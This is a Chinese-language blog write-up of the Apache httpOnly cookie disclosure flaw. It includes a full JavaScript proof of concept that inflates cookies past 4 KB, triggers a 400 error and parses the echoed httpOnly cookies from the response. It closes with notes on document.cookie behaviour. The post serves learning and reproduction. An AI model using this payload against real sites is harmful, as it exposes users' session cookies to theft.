Apache httpOnly cookie disclosure引发的Cookie思考

Posted on

昨天跟朋友一起看一个Apache httpOnly cookie disclosure的漏洞, 涉及到一些知识点, 记录下.

关于Apache httpOnly cookie disclosure这个漏洞, 详情可参考 https://www.t00ls.net/articles-21760.html

当低版本的apache接收到一个大于4k的cookie的时候,会返回一个400的错误,并且把所有的cookie完整的在页面当中显示出来,提示这个cookie过大,那么我们的攻击方式便是利用xss,给用户在正常的cookie的基础上再增加一些无用的cookie,使用户的cookie大于4k,然后js再发包请求一次网站,这时apache返回的响应就是400,并把cookie显示出来

漏洞本身不难理解, 不过在cookie这个地方卡了下, 我们做个简单的复现

在firefox下执行payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();

Cookie已经被追加到很长了, 分析payload的过程中看setcookies函数, 只是将xss0=x…x等赋值给document.cookie, 但为啥打印document.cookie只是在后面追加了呢? 我想这也是为什么这个payload可以导致apache报错爆出真正cookie的原因.

这里就涉及到我想要记录的Cookie知识点了, 看这里

  1. 如果修改相同path下的key值, 如username=”m3lon”, 则会覆盖
  2. 如果document.cookie=”xss1=m3lon”, 则会在原cookie基础上进行添加, 因此, Apache在400页面中爆出cookie错误中会含有原来的cookie值
坚持原创技术分享,您的支持将鼓励我继续创作!